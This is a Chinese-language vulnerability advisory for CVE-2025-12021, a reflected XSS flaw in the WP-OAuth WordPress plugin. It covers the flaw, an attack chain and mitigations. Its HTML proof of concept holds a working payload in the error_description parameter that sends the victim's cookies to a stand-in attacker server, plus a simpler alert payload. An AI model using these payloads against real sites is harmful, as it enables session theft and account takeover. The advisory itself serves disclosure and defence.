CVE-2025-12021: WP-OAuth插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12021

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP-OAuth WordPress插件

漏洞概述

CVE-2025-12021是WordPress平台下WP-OAuth插件的一个反射型跨站脚本(XSS)漏洞。该插件用于实现OAuth第三方登录功能，帮助WordPress站点支持Google、Facebook等社交账号登录。漏洞存在于插件的错误处理机制中，具体位于login-google.php文件的error_description参数处理逻辑。由于插件在处理OAuth认证失败返回的错误描述时，未对用户输入进行充分的输入清理和输出转义，导致攻击者可以通过构造恶意链接，在受害者浏览器中执行任意JavaScript脚本。攻击者只需诱导已登录用户点击特制的恶意链接，即可窃取用户的会话Cookie、劫持账户或进行其他恶意操作。此漏洞影响该插件0.4.1及以下所有版本，由于插件涉及用户认证流程，漏洞利用可能对站点安全性造成较大威胁。Wordfence安全团队于2025年11月11日披露此漏洞，建议站点管理员立即采取修复措施。

技术细节

该漏洞属于典型的反射型跨站脚本漏洞。漏洞点位于WP-OAuth插件的OAuth认证错误处理流程中。当用户通过WP-OAuth进行第三方登录（如Google登录）时，如果认证过程出现错误，插件会通过error_description参数将错误信息返回给用户。问题在于该参数值直接被嵌入到HTML响应中而未经过任何过滤或转义处理。攻击者可以构造形如包含<script>alert(document.cookie)</script>的error_description参数值的URL，当用户访问该URL时，恶意脚本代码会被浏览器解析执行。由于该漏洞位于认证流程中，攻击者通常会针对已登录的管理员或具有较高权限的用户，通过窃取其Cookie或会话令牌来进一步渗透站点。漏洞利用的关键在于用户点击攻击者构造的恶意链接这一用户交互行为，因此该漏洞被标记为需要用户交互(UI:R)。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者确认目标网站使用WP-OAuth插件且版本在0.4.1或以下，通过查看页面源码或插件目录确认插件版本

STEP 2

步骤2: 构造恶意链接

攻击者构造包含恶意JavaScript代码的error_description参数值的OAuth错误URL，例如在error_description中嵌入<script>标签

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导已登录的WordPress用户（如管理员）点击构造好的恶意链接

STEP 4

步骤4: XSS payload执行

当用户点击链接后，恶意脚本代码通过error_description参数反射到页面中，被用户浏览器解析执行

STEP 5

步骤5: 敏感信息窃取

攻击者通过JavaScript代码窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 6

步骤6: 账户劫持

攻击者利用窃取的会话信息劫持用户账户，进一步控制整个WordPress站点

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12021 PoC: WP-OAuth Plugin Reflected XSS -->
<!-- Target: WordPress site with WP-OAuth plugin <= 0.4.1 -->
<!-- Attack Vector: error_description parameter in OAuth error handling -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-12021 PoC</title>
</head>
<body>
    <h2>CVE-2025-12021 - WP-OAuth Reflected XSS PoC</h2>
    <p>Click the link below to test the vulnerability:</p>
    
    <!-- Malicious URL that triggers the XSS via error_description parameter -->
    <a href="http://target-wordpress-site.com/wp-login.php?redirect_to=/wp-admin/&error=access_denied&error_description=<script>alert('XSS Vulnerability - CVE-2025-12021');document.location='http://attacker-server/log.php?c='+document.cookie</script>" target="_blank">Malicious OAuth Link</a>
    
    <p>Or construct the URL manually:</p>
    <pre>
    [Target-URL]/wp-login.php?redirect_to=/wp-admin/
    &error=access_denied
    &error_description=<script>alert(document.cookie)</script>
    </pre>
    
    <script>
        // Log stolen cookies
        console.log('PoC for CVE-2025-12021');
        console.log('Steal cookies via error_description parameter');
    </script>
</body>
</html>

影响范围

WP-OAuth <= 0.4.1 (所有版本)

防御指南

临时缓解措施

由于该漏洞已被公开披露且存在在野利用可能，建议立即采取以下临时缓解措施：1) 如果无法立即升级插件，可暂时禁用WP-OAuth插件或限制其访问；2) 在Web应用防火墙(WAF)或CDN层面添加规则过滤error_description参数中的HTML标签和JavaScript代码；3) 提醒用户不要点击来源不明的OAuth登录链接；4) 加强站点监控，及时发现异常访问和攻击行为；5) 考虑实施额外的会话安全措施如HttpOnly和Secure标志的Cookie配置。